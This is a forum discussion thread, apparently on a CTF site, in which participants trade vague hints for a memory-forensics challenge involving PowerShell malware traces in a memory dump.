Reminiscent

Thanks!

@rotarydrone Can I PM you? I think i have it mostly solved but missing the first half of the flag.

@rotarydrone Nevermind. A reboot somehow fixed it. Got the rest.

i got the string with Base64 encoding.while decode the string, $stP,$siP…shown,anyone can help me to find the correct flag.

Mmm memory forensics :slight_smile:

found a couple of malware and link to the resume.zip , analysis shows powershell calls but cant find the flag , is there something i am overlooking?

@FEVING said:
found a couple of malware and link to the resume.zip , analysis shows powershell calls but cant find the flag , is there something i am overlooking?

maybe dumping the powershell processes and searching will help?

@charybdis said:

@FEVING said:
found a couple of malware and link to the resume.zip , analysis shows powershell calls but cant find the flag , is there something i am overlooking?

maybe dumping the powershell processes and searching will help?

dumping the ps process and searching leads to what @FEVING found

first time tinkering with this type of work, it’s interesting. haven’t found the flag yet. i’ve been reading dumps and online docs all day ~_~

Dumped the processes, dumped the memory, searched the strings, found the links, still no luck. Any help?

I think i have the file but not able to find flag, please help

@roboteknix said:
I think i have the file but not able to find flag, please help

pm me by explaining what you did , I can give you clues.

@C3PJoe said:
Dumped the processes, dumped the memory, searched the strings, found the links, still no luck. Any help?

If you haven’t completed the challenge by now feel free to PM me.

can anyone who has solve this challenge PM me? found the APT .LNK file but not sure how to get the flag. Any hints?

Solved it. It’s not that simple. This text helped me a lot
https://technical.nttsecurity.com/post/102egyy/hunting-malware-with-memory-analysis
But still is a lot of looking and trying.
It was a good challenge !
PM if hints needed.

@deleite said:
Solved it. It’s not that simple. This text helped me a lot
https://technical.nttsecurity.com/post/102egyy/hunting-malware-with-memory-analysis
But still is a lot of looking and trying.
It was a good challenge !
PM if hints needed.

This was a world of help, Thanks heaps.
First time doing anything like this at all, Once I figured out what was able to be seen, Finding the flag took no more than 10 minutes.
Awesome challenge learnt a lot.

@Blkph0x said:

@deleite said:
Solved it. It’s not that simple. This text helped me a lot
https://technical.nttsecurity.com/post/102egyy/hunting-malware-with-memory-analysis
But still is a lot of looking and trying.
It was a good challenge !
PM if hints needed.

This was a world of help, Thanks heaps.
First time doing anything like this at all, Once I figured out what was able to be seen, Finding the flag took no more than 10 minutes.
Awesome challenge learnt a lot.

Im glad it helped. Respect maybe?

Hi have solved this challenge. However, I am not sure what was the use for the “resume.eml” file. Happy to discuss if anyone has solved it using .eml file?

Type your comment> @mendedsiren63 said:

Hi have solved this challenge. However, I am not sure what was the use for the “resume.eml” file. Happy to discuss if anyone has solved it using .eml file?

The .eml is provided Just as a hint to assist with the challenge or provide a starting point/things to look for.

Type your comment> @rotarydrone said:

Type your comment> @mendedsiren63 said:

Hi have solved this challenge. However, I am not sure what was the use for the “resume.eml” file. Happy to discuss if anyone has solved it using .eml file?

Just a hint to assist with the challenge or provide a starting point/things to look for.

Check the link from @deleite , go step by step, anything suspicious running on the box? what window’s powerful application attackers used these days? dive into that application and you will find the flag.

.